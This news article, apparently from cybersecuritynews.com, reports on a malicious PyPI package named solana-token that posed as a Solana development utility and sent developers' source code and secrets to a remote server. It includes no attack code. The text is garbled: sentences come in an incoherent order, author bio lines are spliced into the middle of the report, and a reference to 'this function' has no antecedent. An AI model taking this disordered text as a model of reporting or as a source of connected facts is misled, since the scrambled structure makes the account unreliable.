A newly discovered malicious Python package, solana-token, has been weaponized to steal source code and sensitive secrets from developers working on Solana blockchain applications. Uploaded to the Python Package Index (PyPI), the module masqueraded as a legitimate utility for Solana-based projects but harbored code designed to exfiltrate critical data to a remote server. The campaign aligns with a broader trend: 23 malicious crypto-focused supply chain attacks were documented in 2024 alone, per RL’s 2025 Software Supply Chain Security Report. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. Developers are urged to audit dependencies, monitor for suspicious network activity, and adopt tools like static code analysis to detect obfuscated threats. As supply chain attacks evolve, proactive defense remains critical to safeguarding sensitive code and infrastructure. By harvesting developers’ unprotected secrets (e.g., API keys, wallet credentials), attackers gain a foothold in cryptocurrency projects, posing risks to both individual developers and decentralized platforms. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. ReversingLabs researchers identified the threat in May 2025, noting its rapid dissemination: the package was downloaded over 600 times before its removal. ReversingLabs analysts highlighted the package’s unique focus on source code exfiltration-a tactic less common in typical infostealer campaigns. Notably, the attackers reused the solana-token name from a 2024 PyPI package removed for similar activity. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. When invoked, this function iterates through the Python execution stack, identifying .py files unrelated to specific libraries (prices.py, importlib).
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 15 May 2025 06:20:19 +0000